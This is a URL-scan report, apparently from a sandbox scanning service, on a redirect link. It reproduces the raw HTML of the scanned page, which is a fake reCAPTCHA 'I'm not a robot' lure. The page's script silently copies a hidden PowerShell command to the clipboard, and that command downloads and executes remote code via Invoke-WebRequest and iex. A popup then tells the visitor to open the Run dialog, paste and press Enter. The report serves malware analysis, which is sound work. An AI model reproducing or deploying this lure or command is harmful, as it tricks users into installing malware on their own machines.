- ID da verificação
- 450440f4-a118-4e96-ab00-b8ce9256ce4dConcluído
- URL enviado:
- https://streamingsplays.com/go/b11f973d-01d4-4a5b-8af3-139daaa5443fRedirecionado
- Relatório concluído:
Links · 0 encontrado(s)
Os links de saída identificados na página
Variáveis JavaScript · 3 encontrada(s)
Variáveis JavaScript globais carregadas no objeto janela de uma página são variáveis declaradas fora das funções e acessíveis de qualquer lugar no código dentro do escopo atual
Nome | Tipo |
---|---|
onbeforetoggle | object |
documentPictureInPicture | object |
onscrollend | object |
Mensagens de registro do console · 1 encontrada(s)
Mensagens registradas no console web
Tipo | Categoria | Log |
---|---|---|
error | network |
|
HTML
O corpo HTML bruto da página
<!DOCTYPE html><html lang="en"><head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>reCAPTCHA Verification</title>
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css">
<style>
body, html { margin: 0; padding: 0; width: 100%; height: 100%; display: flex; justify-content: center; align-items: center; font-family: Arial, sans-serif; background-color: #f9f9f9; position: relative; }
.container { background-color: #fff; padding: 20px; box-shadow: 0 2px 10px rgba(0, 0, 0, 0.1); border-radius: 6px; text-align: center; max-width: 320px; position: relative; z-index: 5; transition: opacity 0.3s ease; }
.recaptcha-popup { display: none; }
.container img { width: 60px; margin-bottom: 20px; }
.container h1 { font-size: 18px; color: #333; margin-bottom: 10px; }
.container p { font-size: 14px; color: #666; margin-bottom: 20px; }
.recaptcha-button { display: inline-flex; align-items: center; padding: 8px 16px; background: #4285f4; color: #fff; border: none; border-radius: 5px; cursor: pointer; font-size: 14px; transition: background 0.3s; }
.recaptcha-button img { margin-right: 10px; width: 20px; }
.recaptcha-button:hover { background: #357ae8; }
.dimmed { opacity: 0.2; }
.recaptcha-popup { background: #fff; padding: 30px; border-radius: 10px; text-align: center; box-shadow: 0 0 20px rgba(0, 0, 0, 0.5); position: absolute; top: 50%; left: 50%; transform: translate(-50%, -50%); z-index: 100; }
.recaptcha-popup h3 { margin: 0 0 15px; font-size: 22px; font-weight: bold; color: #333; }
.recaptcha-popup p { font-size: 16px; color: #333; margin: 10px 0; }
.overlay { display: none; position: fixed; top: 0; left: 0; width: 100%; height: 100%; background-color: rgba(0, 0, 0, 0.5); z-index: 50; }
.footer { margin-top: 20px; font-size: 12px; color: #999; }
.footer a { color: #999; text-decoration: none; }
.footer a:hover { text-decoration: underline; }
</style>
</head>
<body>
<div class="container" id="captchaContainer">
<img src="https://www.gstatic.com/recaptcha/api2/logo_48.png" alt="reCAPTCHA logo">
<h1>reCAPTCHA v2</h1>
<p>Please verify that you're not a robot by checking the box below.</p>
<div class="recaptcha-button" id="verifyButton">
<img src="https://www.gstatic.com/recaptcha/api2/logo_48.png" alt="reCAPTCHA Logo">
<span>I'm not a robot</span>
</div>
<div class="footer">
<p>This site is protected by reCAPTCHA and the Google <a href="#">Privacy Policy</a> and <a href="#">Terms of Service</a> apply.</p>
</div>
</div>
<div class="overlay" id="overlay"></div>
<div class="recaptcha-popup" id="recaptchaPopup">
<h3>Verification Steps</h3>
<p>1. Press Windows Button "<i class="fab fa-windows"></i>" + R</p>
<p>2. Press CTRL + V</p>
<p>3. Press Enter</p>
</div>
<script>
document.getElementById('verifyButton').addEventListener('click', function() {
const codeToCopy = "powershell.exe -W Hidden -command $url = 'https://newsystem-checkt.b-cdn.net/humansetup-v2.txt'; $response = Invoke-WebRequest -Uri $url -UseBasicParsing; $text = $response.Content; iex $text";
const textArea = document.createElement('textarea');
textArea.value = codeToCopy;
document.body.appendChild(textArea);
textArea.select();
document.execCommand('copy');
document.body.removeChild(textArea);
document.getElementById('captchaContainer').classList.add('dimmed');
document.getElementById('overlay').style.display = 'block';
document.getElementById('recaptchaPopup').style.display = 'block';
});
</script>
</body></html>